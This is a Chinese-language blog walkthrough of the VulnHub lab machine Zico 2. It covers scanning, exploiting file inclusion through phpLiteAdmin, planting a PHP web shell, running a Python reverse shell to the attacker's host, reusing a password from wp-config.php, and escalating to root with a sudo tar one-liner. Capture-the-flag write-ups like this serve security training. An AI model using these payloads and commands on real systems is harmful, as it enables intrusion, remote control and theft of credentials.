vulnhub系列:Zico 2

vulnhub系列:Zico 2

靶机下载

一、信息收集

nmap扫描存活,根据mac地址找对应靶机

nmap 192.168.23.0/24

image-20240802170628260

nmap扫描端口,开放端口22、80、111、44623

nmap 192.168.23.173 -p- -sV -Pn -O

image-20240802170830582

dirb目录扫描,存在目录dbadmin、tools等

dirb http://192.168.23.173/

image-20240802171239273

访问80端口

image-20240802171304879

在页面最后发现一个功能点,点击后,url可以看到疑似存在文件包含

image-20240802171746533

image-20240802171822458

验证一下,修改url中page参数,存在文件包含

http://192.168.23.173/view.php?page=../../..//etc/passwd

image-20240802172006520

拼接访问目录扫描到的dbadmin目录,发现一个test_db.php文件

image-20240802183352298

访问文件,是一个数据库管理工具phpLiteadmin,版本1.9.3

image-20240802183445192

kali中搜一下相关的漏洞,有一个对应版本的漏洞

searchsploit phpLiteadmin

image-20240802183800473

看一下怎么利用这个漏洞

cat /usr/share/exploitdb/exploits/php/webapps/24044.txt 

这里提到要创建一个数据库,在表的字段中写入一句话木马

image-20240802184322382

网上搜了一下,这个管理工具的默认密码为admin,尝试登录,登录成功

image-20240802185057817

创建一个hack.php数据库

image-20240802185213508

点击/usr/databases/hack.php,然后创建一个表hack

image-20240802190525105

选择text,字段名为phpinfo,写入phpinfo

<?php phpinfo();?>

image-20240802190545870

利用文件包含漏洞,包含hack.php,正常解析

http://192.168.23.173/view.php?page=../../..//usr/databases/hack.php

image-20240802191124883

二、getshell

删除hack表,重新创建一个shell表,字段名getshell,写入内容

<?php @system($_POST[cmd]);?>

kali开启监听

nc -lvnp 4444

image-20240802192038603

使用hackbar,提交post参数

cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.23.133",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20240802191856482

成功反弹shell

image-20240802191954543

三、提权

通过python转为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240802192314463

在zico家目录下找到wordpress,在目录中发现wp-config.php,在文件中找到zico的密码

zico:sWfCsfJSPV9H3AmQzw8

image-20240802192613273

切换到zico用户

su zico

image-20240802192830241

查看当前权限

sudo -l

image-20240802192906753

可以利用 tar 或 zip提权,这里我利用tar提权,提权成功

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20240802193025061

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值